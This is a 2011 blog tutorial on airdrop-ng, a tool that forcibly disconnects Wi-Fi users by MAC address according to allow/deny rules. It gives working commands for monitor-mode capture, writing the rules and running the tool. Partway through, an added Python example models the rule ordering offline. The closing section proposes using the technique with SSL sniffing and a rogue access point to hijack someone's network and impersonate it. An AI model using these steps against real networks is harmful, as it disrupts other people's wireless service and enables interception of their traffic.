
Wednesday, July 13, 2011

"Airbomb"

Airdrop-ng tutorial - Rule Based Deauth

This tutorial is based on BackTrack 4, and I'll assume you are competent with Linux to the standard this tutorial requires. You must also have a wireless interface that supports packet injection and monitor mode.

Capturing Your Surroundings
First we need to capture the wireless activity in the area.

airmon-ng [to check the interface you will be using]
airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly]
airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']

The next step can be done before capturing if you already know the MAC address of a specific target, but it is normally done afterwards, so that you can review the airodump-ng output in the terminal [last command above].

MAC Rules Info
We need to understand the basic formula for how the 'rules' work within airdrop-ng: a = allow, whereas d = deny. I know, rocket science, isn't it lol. This is where it gets to the good bit. Each rule, whether it allows or denies access, is written as allow (a) or deny (d), then the bssid's MAC, followed by the client's MAC. Below are examples of how it would look.


Allow rule: a/bssid MAC ['any']|client's MAC ['any']

Deny rule: d/bssid MAC ['any']|client's MAC ['any']

However, you may wonder what the 'any' is for. If you decide you don't want anyone to connect to a bssid, you would put this, for example:

d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]

To do the opposite and stop a client MAC from connecting to anything:

d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being in this example the client you wish to block]

Implementing MAC Rules
To put the rules in place we need to set up a 'rules' file, which airdrop-ng will read and implement the rules from. To add rules to the file we do so thus:

echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']

The contents will look like this [remember I'm using D to remind you this is Deny!!]:
#D
d/any|xy:xy:xy:xy:xy:xy


Running Airdrop-ng
Installing Airdrop through Synaptic is what I'll advise you to do, as it places everything in the right place for you to follow this tutorial. Navigate using the terminal to the airdrop directory:
cd /pentest/wireless/airdrop-ng/

Once there we start airdrop-ng:
airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]

We next have to understand a very important concept in how airdrop-ng reads the rules file. The program reads from top to bottom, so allow rules applying to a specific MAC must come before deny rules applying to the same MAC. I'll demonstrate using another example.

#D
d/xy:xy:xy:xy:xy:xy|any
[we've now blocked all access to an AP/bssid, but then we decide we want a specific MAC only to connect to it. This must be done as shown below].

#A
a/xy:xy:xy:xy:xy:xy|yz:yz:yz:yz:yz:yz
#D
d/xy:xy:xy:xy:xy:xy|any


As you can see above, our original rule denying every connection to the AP is below the rule that grants/allows access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use the following command:

nano rules [you can use other text editors but I prefer nano, it's down to personal preference]

Note: a lot of cases have been reported on a few forums of airdrop not responding to more than the 1st allow rule. So have one allow and the rest denials.
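
A small offline model of the top-to-bottom ordering described above, added here as an example (it is not airdrop-ng's own code): it parses the a/d rule format from this tutorial, reports which rule decides a given bssid/client pair, and lists any rule that an earlier one makes unreachable. The MAC addresses are constructed, and treating '#' lines as ignored headings and stopping at the first match are assumptions.

```python
# Added example: a model of the rule ordering this tutorial describes.
# Not airdrop-ng's code; skipping '#' lines and first-match are assumptions.

def parse_rules(text):
    """Return [(action, bssid, client), ...] in file order."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):   # '#A' / '#D' headings
            continue
        action, sep, rest = line.partition("/")
        bssid, bar, client = rest.partition("|")
        if action not in ("a", "d") or not sep or not bar or not bssid or not client:
            raise ValueError(f"line {lineno}: expected a|d/bssid|client, got {line!r}")
        rules.append((action, bssid.strip().lower(), client.strip().lower()))
    return rules

def decide(rules, bssid, client):
    """First matching rule wins: 'a', 'd', or None if nothing matches."""
    bssid, client = bssid.lower(), client.lower()
    for action, r_bssid, r_client in rules:
        if r_bssid in ("any", bssid) and r_client in ("any", client):
            return action
    return None

def shadowed(rules):
    """Indexes of rules that an earlier, equal-or-broader rule makes unreachable."""
    out = []
    for i, (_, b, c) in enumerate(rules):
        for _, pb, pc in rules[:i]:
            if pb in ("any", b) and pc in ("any", c):
                out.append(i)
                break
    return out

# Constructed sample MACs (locally administered range), not from the page.
AP, LAPTOP, PHONE = "02:00:00:00:00:01", "02:00:00:00:00:aa", "02:00:00:00:00:bb"
GOOD = f"#A\na/{AP}|{LAPTOP}\n#D\nd/{AP}|any\n"   # allow above deny
BAD = f"#D\nd/{AP}|any\n#A\na/{AP}|{LAPTOP}\n"    # deny above allow

if __name__ == "__main__":
    for name, text in (("allow first", GOOD), ("deny first", BAD)):
        rules = parse_rules(text)
        print(name, "| laptop:", decide(rules, AP, LAPTOP),
              "| phone:", decide(rules, AP, PHONE),
              "| unreachable rules:", shadowed(rules))
```

With the deny line first, the allow rule for the laptop is reported as unreachable, which is the ordering mistake this section warns about.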

OUI [Organizationally Unique Identifier] Hardware names
Airdrop also has the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implemented in the same way as the MACs. I won't be giving out a tutorial on this part because it's had hit and miss results and I've not personally tried it, only the MAC deauth.
However, the OUI list is located below:
nano /pentest/wireless/airdrop-ng/support/oui.txt

To update the OUI list use:
airdrop-ng -u

How does this tutorial help you?
If you combine my other tutorial on SSL sniffing and SoftAPs with this, you could hijack someone's AP, route traffic through your softAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system.
